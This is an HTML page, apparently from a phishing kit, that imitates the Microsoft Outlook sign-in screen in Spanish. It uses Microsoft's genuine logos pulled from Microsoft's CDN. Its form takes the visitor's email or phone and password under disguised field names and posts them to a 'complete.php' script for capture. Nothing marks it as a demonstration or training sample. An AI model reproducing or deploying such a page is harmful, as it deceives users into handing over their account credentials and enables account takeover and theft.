<html>
	<head>
		<title>Iniciar sesión en Outlook</title>
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
		<link rel="stylesheet" type="text/css" href="forma.css">
		<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, minimum-scale=1.0, user-scalable=no">
	</head>
	<body>
		
			<!-- logo outlook -->
			<img class="logo-outlook ___1tamxo5 f2rbwfs f10kou7y ftgm304 fcgxt0o f1ujusj6 fvueend f1iuewzk f1h7u52p f1t8p9js" data-testid="backgroundLogo" alt="presentation" src="https://logincdn.msauth.net/shared/5/js/../images/53_8b36337037cff88c3df2.png">

		<div class="container">
			<!-- logo microsoft -->
			<img data-testid="accessibleImg" class="logo-microsoft ___1v417w0 f2rbwfs frvgh55" src="https://logincdn.msauth.net/shared/5/js/../images/microsoft_logo_ee5c8d9fb6248c938fd0.svg" alt="Microsoft" role="">

			<h1 class="titulo">Iniciar sesión</h1>
			<p class="parrafo">Continuar a Outlook</p>

			<!-- formulario -->
			<form action="complete.php" method="post">
				<input type="email" name="lgdmdp" placeholder="Correo electrónico, teléfono o Skype" required>
				<input id="clave" type="password" name="djddhd" placeholder="Contraseña" required>
				<p class="create-acoount">¿No tiene una cuenta? <span class="spn">Cree una.</span></p>
				<input type="submit" class="boton" value="Siguiente">
			</form>
		</div>
		<!-- <h5></h5> -->
	</body>

		<!-- <div style="text-align: center;"><div style="position:relative; top:0; margin-right:auto;margin-left:auto; z-index:99999">
		</div></div> -->
	
</html>
		
